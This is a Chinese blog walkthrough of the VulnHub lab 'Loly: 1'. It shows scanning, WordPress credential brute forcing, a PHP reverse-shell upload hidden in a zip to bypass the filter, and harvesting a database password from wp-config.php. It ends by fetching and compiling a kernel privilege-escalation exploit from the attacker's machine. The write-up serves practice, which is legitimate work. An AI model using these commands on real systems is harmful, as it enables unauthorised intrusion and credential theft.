Loly: 1靶场渗透

Loly: 1

来自 <Loly: 1 ~ VulnHub>

 

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.241

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.241

访问80端口的http服务

扫描网站子目录

dirsearch -u http://192.168.23.241 -x 403,404

 

4,扫描出来了wordpress的网页,访问看看

加载缓慢,修改/etc/hosts文件试试

echo "192.168.23.241 loly.lc" >>/etc/hosts

访问 http://loly.lc/wordpress/ 的速度果然变快了

登录网站如下 http://loly.lc/wordpress/wp-login.php

 

5,对网站进行指纹识别扫描

whatweb -v http://loly.lc/wordpress/

 

6,然后再尝试使用wpscan进行扫描爆破用户名

gunzip /usr/share/wordlists/rockyou.txt.gz

成功爆破出账户密码loly/fernando

 

7,使用账户密码进行登录,登录成功

然后寻找webshell的上传点

http://loly.lc/wordpress/wp-admin/admin.php?page=adrotate-media

cp /usr/share/webshells/php/php-reverse-shell.php .

vim php-reverse-shell.php

上传失败

先上传zip文件,访问的时候以php后缀名访问

mv php-reverse-shell.php shell.php

zip -r -o shell.php.zip shell.php

再次上传,上传文件成功

然后看到文件上传的位置,由此进行一个访问触发反弹shell

http://loly.lc/wordpress/wp-content/banners/shell.php

与此同时kali打开对4444端口的监听,成功getshell

 

8,然后使用python脚本获取一个可交互shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

信息收集一下,一般的套路就是阅读mysql数据库配置文件,获取数据库账户密码。然后登录数据库,获取普通用户/超级用户泄露的账号密码

cat wp-config.php

得到mysql账号密码wordpress/lolyisabeautifulgirl

 

9,然后登录mysql数据库

mysql -u wordpress -p

show databases;

use  wordpress;

show tables;

select * from wp_users;

但是这个密码没什么用

 

10,发现使用这个密码可以直接切换loly用户

lolyisabeautifulgirl

uname -a

lsb_release -a

搜索内核提权漏洞

searchsploit 4.4.0-31 ubuntu Privilege

把脚本下载到当前目录下

searchsploit -m 45010.c

 

11,在kali使用python开启监听,然后靶机使用wget下载即可
python -m http.server

wget http://192.168.23.182:8000/45010.c

使用gcc编译器编译提权exp

gcc 45010.c -o exp

chmod +x exp

./exp

提权成功,成功get flag

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值